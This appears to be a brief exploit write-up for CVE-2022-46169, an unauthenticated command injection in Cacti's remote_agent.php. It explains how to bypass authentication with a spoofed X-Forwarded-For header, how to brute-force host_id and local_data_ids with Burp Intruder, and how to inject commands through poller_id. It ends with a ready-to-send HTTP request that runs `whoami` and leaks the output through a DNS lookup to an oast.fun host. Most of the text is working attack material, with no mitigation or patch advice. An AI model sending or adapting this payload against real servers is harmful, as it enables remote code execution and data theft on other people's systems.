Awesome
CVE-2022-46169
CVE-2022-46169 Cacti remote_agent.php Unauthenticated Command Injection.
Auth Bypass
Add X-Forwarded-For
header to bypass authentication, note that its value is not a fixed value.
Brute Force
Use Burp Intruder to fuzz test the values of host_id
and local_data_ids
.
RCE
The point of command injection is the poller_id
parameter.
GET /cacti/remote_agent.php?action=polldata&poller_id=;ping%20-c%202%20`whoami`.ccsy8s32vtc0000x5nagg8rkyboyyyyyc.oast.fun&host_id=2&local_data_ids[]=6 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For: 127.0.0.1